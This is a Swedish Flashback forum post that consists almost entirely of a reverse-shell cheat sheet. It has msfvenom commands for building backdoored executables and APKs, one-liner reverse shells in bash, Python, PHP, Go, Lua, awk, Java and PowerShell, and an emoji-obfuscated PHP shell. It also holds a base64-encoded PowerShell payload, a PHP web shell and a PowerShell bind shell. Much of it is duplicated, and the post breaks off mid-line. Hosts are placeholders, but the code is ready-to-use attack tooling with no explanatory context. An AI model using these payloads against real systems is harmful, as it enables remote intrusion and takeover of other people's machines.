__________________
Senast redigerad av 0xgh64 2022-12-03 kl. 01:36.
Senast redigerad av 0xgh64 2022-12-03 kl. 01:36.
php -r '$😀="1";$ðŸ˜="2";$😅="3";$😆="4";$😉="5";$😊="6";$😎="7";$ðŸ˜="8";$😚="9";$🙂="0";$🤢=" ";$🤓="<";$🤠=">";$😱="-";$😵="&";$🤩="i";$🤔=".";$🤨="/";$🥰="a";$ðŸ˜="b";$😶="i";$🙄="h";$😂="c";$🤣="d";$😃="e";$😄="f";$😋="k";$😘="n";$😗="o";$😙="p";$🤗="s";$😑="x";$💀 = $😄. $🤗. $😗. $😂. $😋. $😗. $😙. $😃. $😘;$🚀 = "ip-address";$💻 = port;$🚠= "sh". $🤢. $😱. $🤩. $🤢. $🤓. $😵. $😅. $🤢. $🤠. $😵. $😅. $🤢. $ðŸ˜. $🤠. $😵. $😅;$🤣 = $💀($🚀,$💻);$👽 = $😃. $😑. $😃. $😂;$👽($ðŸš);'
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe
msfvenom -p windows/x64/shell/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '' -f python -v notBuf -o shellcode
msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f macho -o shell.macho
msfvenom -p osx/x64/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f macho -o shell.macho
msfvenom -p php/meterpreter_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f raw -o shell.php
msfvenom -p php/reverse_php LHOST=xx.xx.xx.x LPORT=xxxx -o shell.php
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f raw -o shell.jsp
msfvenom -p java/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f war -o shell.war
msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=xx.xx.xx.x lport=xxxx R -o malicious.apk
msfvenom --platform android -x template-app.apk -p android/meterpreter/reverse_tcp lhost=xx.xx.xx.x lport=xxxx -o payload.apk
msfvenom -p cmd/unix/reverse_python LHOST=xx.xx.xx.x LPORT=xxxx -f raw
msfvenom -p cmd/unix/reverse_bash LHOST=xx.xx.xx.x LPORT=xxxx -f raw -o shell.sh
sh -i 5<> /dev/tcp/xx.xx.xx.xx/9001 0<&5 1>&5 2>&5
exec 5<>/dev/tcp/xx.xx.xx.xx/9001;cat <&5 | while read line; do $line 2>&5 >&5; done
0<&196;exec 196<>/dev/tcp/xx.xx.xx.xx/9001; sh <&196 >&196 2>&196
sh -i >& /dev/tcp/xx.xx.xx.xx/9001 0>&1
awk 'BEGIN {s = "/inet/tcp/0/xx.xx.xx.xx/9001";
while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
echo 'import os' > /tmp/t.v && echo 'fn main() { os.system("nc -e sh xx.xx.xx.xx 9001 0>&1") }' >> /tmp/t.v && v run /tmp/t.v && rm /tmp/t.v
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","xx.xx.xx.xx:9001");cmd:=exec.Command("sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
lua5.1 -e 'local host, port = "xx.xx.xx.xx", 9001 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
lua -e "require('socket');require('os');t=socket.tcp();t:connect('xx.xx.xx.xx','9001');os.execute('sh -i <&3 >&3 2>&3');"
zsh -c 'zmodload zsh/net/tcp && ztcp xx.xx.xx.xx 9001 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
TF=$(mktemp -u);mkfifo $TF && telnet xx.xx.xx.xx 9001 0<$TF | sh 1>$TF
String host="xx.xx.xx.xx";int port=9001;String cmd="sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
String command = "var host = 'xx.xx.xx.xx';" +
"var port = 9001;" +
"var cmd = 'sh';"+
"var s = new java.net.Socket(host, port);" +
"var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();"+
"var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();"+
"var po = p.getOutputStream(), so = s.getOutputStream();"+
"print ('Connected');"+
"while (!s.isClosed()) {"+
" while (pi.available() > 0)"+
" so.write(pi.read());"+
" while (pe.available() > 0)"+
" so.write(pe.read());"+
" while (si.available() > 0)"+
" po.write(si.read());"+
" so.flush();"+
" po.flush();"+
" java.lang.Thread.sleep(50);"+
" try {"+
" p.exitValue();"+
" break;"+
" }"+
" catch (e) {"+
" }"+
"}"+
"p.destroy();"+
"s.close();";
String x = "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\""+command+"\")";
ref.add(new StringRefAddr("x", x);
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("xx.xx.xx.xx",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xx.xx.xx.xx",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0 AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUA YQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABl AHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0A LgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAw ACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQA ZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABl AHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAA fAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAg ACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUA IAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAk AHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwA JABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBs AGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('xx.xx.xx.xx', 9001);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);popen("sh <&3 >&3 2>&3", "r");'
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);`sh <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);passthru("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);system("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);shell_exec("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);exec("sh <&3 >&3 2>&3");'
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
php -r '$😀="1";$ðŸ˜="2";$😅="3";$😆="4";$😉="5";$😊="6";$😎="7";$ðŸ˜="8";$😚="9";$🙂="0";$🤢=" ";$🤓="<";$🤠=">";$😱="-";$😵="&";$🤩="i";$🤔=".";$🤨="/";$🥰="a";$ðŸ˜="b";$😶="i";$🙄="h";$😂="c";$🤣="d";$😃="e";$😄="f";$😋="k";$😘="n";$😗="o";$😙="p";$🤗="s";$😑="x";$💀 = $😄. $🤗. $😗. $😂. $😋. $😗. $😙. $😃. $😘;$🚀 = "ip-address";$💻 = port;$🚠= "sh". $🤢. $😱. $🤩. $🤢. $🤓. $😵. $😅. $🤢. $🤠. $😵. $😅. $🤢. $ðŸ˜. $🤠. $😵. $😅;$🤣 = $💀($🚀,$💻);$👽 = $😃. $😑. $😃. $😂;$👽($ðŸš);'
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe
msfvenom -p windows/x64/shell/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '' -f python -v notBuf -o shellcode
msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f macho -o shell.macho
sh -i 5<> /dev/tcp/xx.xx.xx.xx/9001 0<&5 1>&5 2>&5
exec 5<>/dev/tcp/xx.xx.xx.xx/9001;cat <&5 | while read line; do $line 2>&5 >&5; done
0<&196;exec 196<>/dev/tcp/xx.xx.xx.xx/9001; sh <&196 >&196 2>&196
sh -i >& /dev/tcp/xx.xx.xx.xx/9001 0>&1
awk 'BEGIN {s = "/inet/tcp/0/xx.xx.xx.xx/9001";
while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
echo 'import os' > /tmp/t.v && echo 'fn main() { os.system("nc -e sh xx.xx.xx.xx 9001 0>&1") }' >> /tmp/t.v && v run /tmp/t.v && rm /tmp/t.v
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","xx.xx.xx.xx:9001");cmd:=exec.Command("sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
lua5.1 -e 'local host, port = "xx.xx.xx.xx", 9001 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
lua -e "require('socket');require('os');t=socket.tcp();t:connect('xx.xx.xx.xx','9001');os.execute('sh -i <&3 >&3 2>&3');"
zsh -c 'zmodload zsh/net/tcp && ztcp xx.xx.xx.xx 9001 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
TF=$(mktemp -u);mkfifo $TF && telnet xx.xx.xx.xx 9001 0<$TF | sh 1>$TF
String host="xx.xx.xx.xx";int port=9001;String cmd="sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
String command = "var host = 'xx.xx.xx.xx';" +
"var port = 9001;" +
"var cmd = 'sh';"+
"var s = new java.net.Socket(host, port);" +
"var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();"+
"var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();"+
"var po = p.getOutputStream(), so = s.getOutputStream();"+
"print ('Connected');"+
"while (!s.isClosed()) {"+
" while (pi.available() > 0)"+
" so.write(pi.read());"+
" while (pe.available() > 0)"+
" so.write(pe.read());"+
" while (si.available() > 0)"+
" po.write(si.read());"+
" so.flush();"+
" po.flush();"+
" java.lang.Thread.sleep(50);"+
" try {"+
" p.exitValue();"+
" break;"+
" }"+
" catch (e) {"+
" }"+
"}"+
"p.destroy();"+
"s.close();";
String x = "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\""+command+"\")";
ref.add(new StringRefAddr("x", x);
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("xx.xx.xx.xx",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
$listener = New-Object System.Net.Sockets.TcpListener 80
$listener.Start()
while ($true) {
$client = $listener.AcceptTcpClient()
$stream = $client.GetStream()
$reader = New-Object System.IO.StreamReader $stream
$writer = New-Object System.IO.StreamWriter $stream
$prompt = "PS > "
$writer.WriteLine("Pseudo Shell")
$writer.WriteLine("")
$writer.Write($prompt)
$writer.Flush()
while ($line = $reader.ReadLine()) {
if ($line -eq "exit") {
$writer.WriteLine("Exiting shell")
break
}
$output = Invoke-Expression $line
$writer.WriteLine($output)
$writer.Write($prompt)
$writer.Flush()
}
$client.Close()
}
while ($line = $reader.ReadLine()) {
if ($line -match "^upload") {
$filename = $line.Split(" ")[1]
$writer.WriteLine("Uploading $filename")
$contents = $reader.ReadToEnd()
$file = [System.IO.Path]::Combine
Du måste vara medlem för att kunna kommentera
Flashback finansieras genom donationer från våra medlemmar och besökare. Det är med hjälp av dig vi kan fortsätta erbjuda en fri samhällsdebatt. Tack för ditt stöd!
Swish: 123 536 99 96 Bankgiro: 211-4106